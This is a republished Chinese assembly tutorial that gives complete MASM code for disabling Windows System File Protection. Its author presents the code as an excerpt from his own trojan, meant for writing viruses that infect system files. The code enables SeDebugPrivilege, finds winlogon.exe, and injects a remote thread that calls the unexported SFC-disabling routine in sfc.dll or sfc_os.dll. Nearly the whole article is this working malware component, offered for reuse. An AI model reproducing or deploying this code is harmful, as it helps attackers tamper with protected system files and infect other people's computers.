汇编代码之关闭系统文件保护

2023-11-04 04:48

本文主要是介绍汇编代码之关闭系统文件保护,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

对于写一些感染系统文件的病毒或木马时,那个"系统文件保护"好象满让人讨厌的,下面给大家一个关闭系统文件保护汇编例子[摘自我个人所写的"冰马"],希望对和我一样初学win32汇编的新手有点帮助!

[转载请保留出处]

作者:冰狐浪子 [http://www.icyfoxlovelace.com]

代码共分四个部分

关闭系统文件保护例子.asm

    .386
.model flat, stdcall
option casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib

include advapi32.inc
includelib advapi32.lib

.code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;冰狐浪子作品代码节选
include 关闭文件保护.asm
Fsb db "无法关闭文件保护!",0
Fcg db "成功关闭文件保护!",0

start:
call _Sfcoff ;关闭文件保护

.if eax
invoke MessageBox,NULL,offset Fcg,offset Fcg,MB_OK
.else
invoke MessageBox,NULL,offset Fsb,offset Fsb,MB_OK
.endif
ret
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
end start
提升权限.asm
;提升权限,获得在系统进程中插入代码的权限
;冰狐浪子作品代码节选
;include advapi32.inc
;includelib advapi32.lib

SE_DEBUG_NAME_Y db "SeDebugPrivilege",0

_EnableDebugPrivilege proc
local @hToken
local @tp:TOKEN_PRIVILEGES

invoke GetCurrentProcess

lea ecx,@hToken
invoke OpenProcessToken,eax,TOKEN_ADJUST_PRIVILEGES,ecx ;addr @hToken

mov @tp.PrivilegeCount,1
invoke LookupPrivilegeValue,NULL,addr SE_DEBUG_NAME_Y,addr @tp.Privileges[0].Luid
mov @tp.Privileges[0].Attributes,SE_PRIVILEGE_ENABLED
invoke AdjustTokenPrivileges,@hToken,FALSE,addr @tp,sizeof @tp,NULL,NULL
push eax
invoke CloseHandle,@hToken
pop eax
ret

_EnableDebugPrivilege endp
查找进程.asm
;根据程序名,查找进程id
;冰狐浪子作品代码节选
;include kernel32.inc
;includelib kernel32.lib
; 例:
; namePr db "EXPLORER.EXE",0
; ............
; invoke _findProcess,offset namePr
; .if eax
; 找到
; .else
; 没找到
; .endif


;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;清零
_ZeroMemory proc _lpDest,_dwSize

push edi
cld
;push _lpDest
mov edi,_lpDest
mov ecx,_dwSize
xor eax,eax

rep stosb
;pop eax
pop edi
ret

_ZeroMemory endp

;计算字符串长度(带尾部的0)
_lstrlen proc _lpString
push edi
cld
mov edi,_lpString
mov ecx,-1
xor al,al
repnz scasb
mov eax,edi
sub eax,_lpString
pop edi
ret
_lstrlen endp

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;;查找进程id 参数:@ProcessName指向进程名的大写字符串地址
;;eax=返回的id(eax=0表示没找到)
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_findProcess proc @ProcessName
local @StringLength ;@ProcessName指向的字符串长度
;用于获取进程
local @hSnapShot
local @stProcess:PROCESSENTRY32

;********************************************************************
; 计算传入 进程名 字符串的长度(带尾部的0)
;********************************************************************

invoke _lstrlen,@ProcessName
mov @StringLength,eax

invoke _ZeroMemory,addr @stProcess,sizeof @stProcess
mov @stProcess.dwSize,sizeof @stProcess
invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,0
mov @hSnapShot,eax

invoke Process32First,@hSnapShot,addr @stProcess
.while eax
lea esi,@stProcess.szExeFile
push esi
mov edi,esi
;变为大写字母
_nextz:
lodsb
cmp al,60h
jc @F
cmp al,7Bh
ja @F
and al,not 20h
@@: STOSB

cmp al,"/"
jnz @F
pop ecx ;保存的esi出栈,无用
push esi
@@:
or al,al
jne _nextz

mov ecx,@StringLength ;字符串比较
pop esi
mov edi,@ProcessName
repz cmpsb

.if ZERO? ;找到了同名进程(ZF=1)
mov eax,@stProcess.th32ProcessID
jmp @F
.endif

invoke Process32Next,@hSnapShot,addr @stProcess
.endw
push eax
invoke CloseHandle,@hSnapShot
pop eax
@@: ret
_findProcess endp


关闭文件保护.asm
;冰狐浪子作品代码节选
include 提升权限.asm
include 查找进程.asm

namePr db "WINLOGON.EXE",0
sfc_2000 db 'sfc.dll',0
sfc_xp db 'sfc_os.dll',0

;关闭文件保护
_Sfcoff proc
local @hSfc
local @hProcess
invoke _EnableDebugPrivilege ;提升权限
invoke _findProcess,offset namePr ;查找进程
invoke OpenProcess,PROCESS_CREATE_THREAD or PROCESS_VM_OPERATION,FALSE,eax
;PROCESS_ALL_ACCESS
.if eax
mov @hProcess,eax ;进程句柄
invoke LoadLibrary,offset sfc_2000
.if !eax
invoke LoadLibrary,offset sfc_xp
.endif
mov @hSfc,eax
invoke GetProcAddress,eax,2
push eax
invoke FreeLibrary,@hSfc
pop eax
.if eax
xor ecx,ecx
invoke CreateRemoteThread,@hProcess,ecx,ecx,eax,ecx,ecx,ecx
.if eax
invoke CloseHandle,eax
jmp @F
.endif
.endif
invoke CloseHandle,@hProcess ;关闭进程句柄
.endif
xor eax,eax
@@: ret
_Sfcoff endp

这篇关于汇编代码之关闭系统文件保护的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/343331

相关文章

python使用Akshare与Streamlit实现股票估值分析教程(图文代码)

《python使用Akshare与Streamlit实现股票估值分析教程(图文代码)》入职测试中的一道题,要求:从Akshare下载某一个股票近十年的财务报表包括,资产负债表,利润表,现金流量表,保存... 目录一、前言二、核心知识点梳理1、Akshare数据获取2、Pandas数据处理3、Matplotl

Django开发时如何避免频繁发送短信验证码(python图文代码)

《Django开发时如何避免频繁发送短信验证码(python图文代码)》Django开发时,为防止频繁发送验证码,后端需用Redis限制请求频率,结合管道技术提升效率,通过生产者消费者模式解耦业务逻辑... 目录避免频繁发送 验证码1. www.chinasem.cn避免频繁发送 验证码逻辑分析2. 避免频繁

精选20个好玩又实用的的Python实战项目(有图文代码)

《精选20个好玩又实用的的Python实战项目(有图文代码)》文章介绍了20个实用Python项目,涵盖游戏开发、工具应用、图像处理、机器学习等,使用Tkinter、PIL、OpenCV、Kivy等库... 目录① 猜字游戏② 闹钟③ 骰子模拟器④ 二维码⑤ 语言检测⑥ 加密和解密⑦ URL缩短⑧ 音乐播放

Python使用Tenacity一行代码实现自动重试详解

《Python使用Tenacity一行代码实现自动重试详解》tenacity是一个专为Python设计的通用重试库,它的核心理念就是用简单、清晰的方式,为任何可能失败的操作添加重试能力,下面我们就来看... 目录一切始于一个简单的 API 调用Tenacity 入门:一行代码实现优雅重试精细控制:让重试按我

Python实现MQTT通信的示例代码

《Python实现MQTT通信的示例代码》本文主要介绍了Python实现MQTT通信的示例代码,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一... 目录1. 安装paho-mqtt库‌2. 搭建MQTT代理服务器(Broker)‌‌3. pytho

MySQL进行数据库审计的详细步骤和示例代码

《MySQL进行数据库审计的详细步骤和示例代码》数据库审计通过触发器、内置功能及第三方工具记录和监控数据库活动,确保安全、完整与合规,Java代码实现自动化日志记录,整合分析系统提升监控效率,本文给大... 目录一、数据库审计的基本概念二、使用触发器进行数据库审计1. 创建审计表2. 创建触发器三、Java

Java中调用数据库存储过程的示例代码

《Java中调用数据库存储过程的示例代码》本文介绍Java通过JDBC调用数据库存储过程的方法,涵盖参数类型、执行步骤及数据库差异,需注意异常处理与资源管理,以优化性能并实现复杂业务逻辑,感兴趣的朋友... 目录一、存储过程概述二、Java调用存储过程的基本javascript步骤三、Java调用存储过程示

Visual Studio 2022 编译C++20代码的图文步骤

《VisualStudio2022编译C++20代码的图文步骤》在VisualStudio中启用C++20import功能,需设置语言标准为ISOC++20,开启扫描源查找模块依赖及实验性标... 默认创建Visual Studio桌面控制台项目代码包含C++20的import方法。右键项目的属性:

MySQL数据库的内嵌函数和联合查询实例代码

《MySQL数据库的内嵌函数和联合查询实例代码》联合查询是一种将多个查询结果组合在一起的方法,通常使用UNION、UNIONALL、INTERSECT和EXCEPT关键字,下面:本文主要介绍MyS... 目录一.数据库的内嵌函数1.1聚合函数COUNT([DISTINCT] expr)SUM([DISTIN

Java实现自定义table宽高的示例代码

《Java实现自定义table宽高的示例代码》在桌面应用、管理系统乃至报表工具中,表格(JTable)作为最常用的数据展示组件,不仅承载对数据的增删改查,还需要配合布局与视觉需求,而JavaSwing... 目录一、项目背景详细介绍二、项目需求详细介绍三、相关技术详细介绍四、实现思路详细介绍五、完整实现代码